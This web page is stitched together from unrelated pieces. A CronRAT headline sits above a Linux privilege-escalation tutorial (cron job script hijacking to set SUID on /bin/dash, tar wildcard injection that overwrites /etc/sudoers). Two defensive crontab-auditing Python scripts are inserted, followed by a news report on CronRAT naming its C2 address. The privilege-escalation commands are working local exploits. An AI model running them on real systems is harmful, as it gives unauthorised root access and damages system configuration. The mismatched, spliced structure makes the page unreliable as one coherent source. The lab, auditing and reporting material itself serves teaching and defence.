New Linux malware hides in cron jobs with invalid dates

After working through several OSCP-style challenges, we decided to write an article about the various techniques used to escalate privileges on Linux, which may be useful to readers in their penetration-testing engagements. In this article you will learn about “Privilege Escalation with Cron Jobs”: how to gain root access on a remote host, and how a misconfigured cron job can lead to privilege escalation. If you have gone through CTF challenges up to the post-exploitation stage, after reading this article you will recognise several misconfigurations that lead to privilege escalation.

For more information, you can read our previous articles where we used this particular privilege escalation trick. This article covers the following topics:

  • Introduction
  • Cron job
  • Crontab syntax
  • Overwrite Crontab File
  • Setting up the lab (Ubuntu)
  • Exploiting the cron job (Kali Linux)
  • Crontab Tar Wildcard Injection
  • Setting up the lab with wildcards (Ubuntu)
  • Exploiting the cron job (Kali Linux)

    What Is a Cron Job?

    Cron jobs are used to schedule tasks on a server by running commands at specific dates and times. They are most often used by system administrators for things like backups or cleaning up directories such as /tmp/. The word cron comes from crontab, and the crontab file lives in the /etc directory.

    For example, we can add the following line to crontab to automatically empty the Apache error log on a schedule (the five fields 1 0 * * 7 mean minute 1, hour 0, any day of the month, any month, day of week 7, i.e. 00:01 every Sunday).

    1 0 * * 7 printf "" > /var/log/apache/error_log

    Overwrite Crontab File

    Goal: Define a new task using crontab to run a Python script that deletes all the data in a specified directory.

    Let’s say “cleanup” is a directory whose contents are automatically purged every two minutes. We therefore save some files in /home/cleanup.

    mkdir cleanup
    cd cleanup
    echo "hello friends" > 1.txt
    echo "ALL files will be deleted in 2 minutes" > 2.txt
    echo > 1.php
    echo > 2.php
    ls

    As you can see in the listing, several files are now stored in the cleanup directory.

    Now write a Python script in another directory that wipes the contents of /home/cleanup, and give it full permissions.

    cd /tmp
    nano cleanup.py
    #!/usr/bin/env python
    import os
    import sys
    try:
        os.system('rm -r /home/cleanup/* ')
    except:
        sys.exit()
    chmod 777 cleanup.py

    Finally, schedule a task with crontab to run cleanup.py every 2 minutes.

    nano /etc/crontab
    */2 * * * * root /tmp/cleanup.py
    cd /home/cleanup
    ls
    date
    ls
    date

    It’s working!! The job does what it should: as you can see, all the files have been deleted after a couple of minutes.

    Exploiting the Cron Job

    Start from the attacking machine: first compromise the target system, then move on to privilege escalation. Let’s say I have successfully logged in to the victim machine over ssh as a non-root user. Run the following enumeration commands as shown below.

    cat /etc/crontab
    ls -al /tmp/cleanup.py
    cat /tmp/cleanup.py

    You can see from the output above that crontab runs a Python script every two minutes as root. Let’s exploit it now.

    There are many ways to abuse this; here we set the SUID bit on /bin/dash. It is quite simple: first open cleanup.py with an editor such as nano and replace the line containing rm -r with the following line.

    os.system('chmod u+s /bin/dash')

    After two minutes the SUID bit will be set on /bin/dash, and running it will give you root access.

    /bin/dash
    id
    whoami

    Crontab Tar Wildcard Injection

    Goal: Schedule a task with crontab that uses tar to create a compressed archive backup of the web server’s HTML directory.

    You must have execute permission on the directory you want to back up.

    Now schedule a task with crontab that runs the tar archiver to back up /var/www/html to /var/backups every minute.

    nano /etc/crontab
    */1 * * * * root tar -zcf /var/backups/html.tgz /var/www/html/*

    Let’s check that the schedule works by running the following commands.

    cd /var/backups
    ls
    date

    In the image below you will notice that the html.tgz file was generated within 1 minute.

    Exploiting the Cron Job

    Start from the attacking machine: first compromise the target system, then move on to privilege escalation. Assume I have logged in to the victim’s system over ssh as a non-root user. Then open crontab to see which tasks are scheduled.

    cat /etc/crontab

    Here we see that the target has scheduled a tar archiver job every minute, and we know that the cron job runs as root. Let’s exploit it.

    Run the following commands to grant sudo privileges to the logged-in user; this exploit is known as tar wildcard injection.

    echo 'echo "ignite ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > test.sh
    echo "" > "--checkpoint-action=exec=sh test.sh"
    echo "" > --checkpoint=1
    tar cf archive.tar *

    After a minute the user ignite will have sudo rights; you can verify this in the image below.

    sudo -l
    sudo bash
    whoami
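The two misconfigurations the labs above demonstrate (a root cron job that executes a world-writable script, and a root tar job whose argument is a shell wildcard) can both be caught by a simple audit of /etc/crontab. The following Python script is an added example written for this page, not code from the original article: it builds a throwaway copy of both jobs in a temporary directory (constructed paths, with the same chmod 777 as the first lab), adds a hardened tar line that passes the directory name through -C instead of a glob, and reports each finding.

```python
import os
import re
import shlex
import stat
import tempfile

GROUP_OR_WORLD_WRITABLE = stat.S_IWGRP | stat.S_IWOTH


def job_lines(crontab_text):
    """Yield (user, command) for each job in an /etc/crontab-style file."""
    for raw in crontab_text.splitlines():
        line = raw.strip()
        # Skip blanks, comments and environment assignments such as PATH=...
        if not line or line.startswith("#") or re.match(r"^[A-Za-z_]\w*=", line):
            continue
        schedule_fields = 1 if line.startswith("@") else 5   # @daily vs. m h dom mon dow
        parts = line.split(None, schedule_fields + 1)
        if len(parts) == schedule_fields + 2:
            yield parts[schedule_fields], parts[schedule_fields + 1]


def unquoted_glob(command):
    """True if the command contains a shell wildcard outside single/double quotes."""
    stripped = re.sub(r"'[^']*'|\"[^\"]*\"", "", command)
    return re.search(r"[*?]", stripped) is not None


def audit_crontab(crontab_text):
    """Report root jobs whose executable is writable by others or that glob into tar."""
    findings = []
    for user, command in job_lines(crontab_text):
        if user != "root":
            continue
        try:
            tokens = shlex.split(command)
        except ValueError:
            continue  # unbalanced quotes: not parseable as a shell command here
        # First token is the program cron runs; stat it if it is an absolute path.
        if tokens and tokens[0].startswith("/") and os.path.isfile(tokens[0]):
            mode = stat.S_IMODE(os.stat(tokens[0]).st_mode)
            if mode & GROUP_OR_WORLD_WRITABLE:
                findings.append(("writable-executable", tokens[0],
                                 "root runs a file writable by group/others (mode %o)" % mode))
        if "tar" in tokens and unquoted_glob(command):
            findings.append(("tar-wildcard", command,
                             "the shell expands the wildcard before tar sees it, so file "
                             "names can be parsed as tar options; use -C <parent> <dir>"))
    return findings


def demo():
    """Build a throwaway lab with the two jobs from the article and audit it."""
    lab = tempfile.mkdtemp()                      # constructed paths, not /tmp/cleanup.py
    cleanup = os.path.join(lab, "cleanup.py")
    with open(cleanup, "w") as fh:
        fh.write("#!/usr/bin/env python3\n")
    os.chmod(cleanup, 0o777)                      # the chmod 777 from the first lab
    backup = os.path.join(lab, "backup.sh")
    with open(backup, "w") as fh:
        fh.write("#!/bin/sh\n")
    os.chmod(backup, 0o755)                       # a correctly protected script
    crontab = f"""\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
*/2 * * * * root {cleanup}
*/1 * * * * root tar -zcf /var/backups/html.tgz /var/www/html/*
*/1 * * * * root tar -zcf /var/backups/html.tgz -C /var/www html
@daily root {backup}
"""
    return audit_crontab(crontab)


if __name__ == "__main__":
    for kind, what, why in demo():
        print(f"[{kind}] {what}\n    {why}")
```

To use it on a real host, read /etc/crontab and the files under /etc/cron.d/ into audit_crontab as root. Only jobs that run as root are reported, and the wildcard check is textual, so it cannot see a glob hidden inside a script that the job calls; the -C form is the fix because the directory name is a fixed argument and the shell never expands anything.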

    Author: Aarti Singh, researcher and technical writer at Hacking Articles, information security consultant, social media and gadget lover.

    Hack Like a Pro: Linux Basics for the Aspiring Hacker, Part 18 (Scheduling Jobs)

    Security researchers have discovered a new remote access trojan (RAT) for Linux that stays almost invisible by hiding in scheduled tasks set to run on a non-existent day, February 31st.

    CronRAT, as the malware is called, currently targets online stores and lets attackers steal credit card data by deploying online payment skimmers on Linux servers.

    CronRAT is inventive and sophisticated as far as online shopping trojans go, and it goes undetected by many anti-malware engines.

    Clever Payload Hiding

    CronRAT abuses the Linux cron job scheduling system, taking advantage of the fact that jobs can be scheduled on non-existent calendar days, such as February 31st.

    Linux cron accepts date specifications as long as they are in the correct format, even if the day does not exist in the calendar, which means the scheduled task will never run.

    This is what CronRAT relies on to stay hidden. A report by Dutch cybersecurity company Sansec says it hides a “sophisticated bash program” in the names of the scheduled tasks.

    “It adds a number of tasks to crontab with a curious date specification: 52 23 31 2 3. These lines are syntactically valid, but would generate a run-time error when executed. However, this will never happen, because they are scheduled to run on February 31st,” Sansec researchers explain.
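As an added example (not from the article or from Sansec’s report), the following Python script parses the five schedule fields described in the crontab syntax section and flags entries, like the 52 23 31 2 3 specification quoted above, whose day-of-month and month fields can never coincide on a real calendar. The sample crontab lines are constructed. One caveat a defender should know: in Vixie cron and cronie, when both the day-of-month and the day-of-week field are restricted, the job runs when either field matches, so the script also reports whether the day-of-week field is restricted rather than assuming the job is dormant.

```python
import calendar
import re

# Constructed sample of an /etc/crontab-style file (not taken from a real host).
SAMPLE_CRONTAB = """\
# m h dom mon dow user  command
SHELL=/bin/sh
17 *  * * *   root   cd / && run-parts --report /etc/cron.hourly
52 23 31 2 3  root   /tmp/.hidden/job.sh
0 4   30 2 *  www-data /usr/local/bin/rotate-logs
0 2   29 2 *  root   /usr/local/bin/leap-day-job
"""


def expand_field(field, lo, hi):
    """Expand one numeric cron field ('*', lists, ranges, steps) into a set of ints."""
    values = set()
    for part in field.split(","):
        step = 1
        if "/" in part:
            part, step_text = part.split("/", 1)
            step = int(step_text)
        if part == "*":
            start, end = lo, hi
        elif "-" in part:
            a, b = part.split("-", 1)
            start, end = int(a), int(b)
        else:
            start = end = int(part)
        values.update(range(start, end + 1, step))
    return values


def impossible_dates(dom_field, mon_field):
    """True if no (day, month) pair of the entry exists in any year."""
    days = expand_field(dom_field, 1, 31)
    months = expand_field(mon_field, 1, 12)
    # A leap year is the most permissive calendar (29 Feb exists), so check against it.
    last_day = {m: calendar.monthrange(2024, m)[1] for m in months}
    return not any(d <= last_day[m] for d in days for m in months)


def audit_impossible_dates(crontab_text):
    """Return one finding per job whose schedule can never match a real date."""
    findings = []
    for lineno, raw in enumerate(crontab_text.splitlines(), 1):
        line = raw.strip()
        # Skip blanks, comments, environment assignments and @reboot-style entries.
        if not line or line.startswith("#") or line.startswith("@"):
            continue
        if re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", line):
            continue
        parts = line.split(None, 6)
        if len(parts) < 7:
            continue
        minute, hour, dom, mon, dow, user, command = parts
        try:
            never = impossible_dates(dom, mon)
        except ValueError:
            continue  # month/day names (feb, sun) are not handled by this example
        if never:
            findings.append({
                "line": lineno,
                "user": user,
                "command": command,
                "schedule": " ".join(parts[:5]),
                # Vixie cron/cronie run a job when EITHER dom or dow matches if both
                # are restricted, so a restricted dow may still fire on weekdays.
                "dow_restricted": dow != "*",
            })
    return findings


if __name__ == "__main__":
    for f in audit_impossible_dates(SAMPLE_CRONTAB):
        note = " (dow restricted: may still run on matching weekdays)" if f["dow_restricted"] else ""
        print(f"line {f['line']}: {f['schedule']} {f['user']} {f['command']}{note}")
```

Any entry this reports deserves a look at the command itself, since a job that cannot fire has no legitimate reason to exist; a hit on a line with a restricted day-of-week field should be treated as possibly live.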

    The payloads are obfuscated several times over, using multiple layers of compression and Base64 encoding. The program includes self-destruct commands, timing modulation, and even its own protocol for communicating with a remote server.

    The report notes that the malware contacts its C2 server (47.115.46.167) using “an exotic feature of the Linux kernel that enables TCP communication via a file.”

    The connection is made over TCP on port 443 using a fake banner for the Dropbear SSH service, which also helps the malware stay undetected.

    After contacting the C2 server, the disguise is dropped, several commands are sent and received, and a malicious dynamic library is retrieved. At the end of these exchanges, the attackers behind CronRAT can run any command on the compromised system.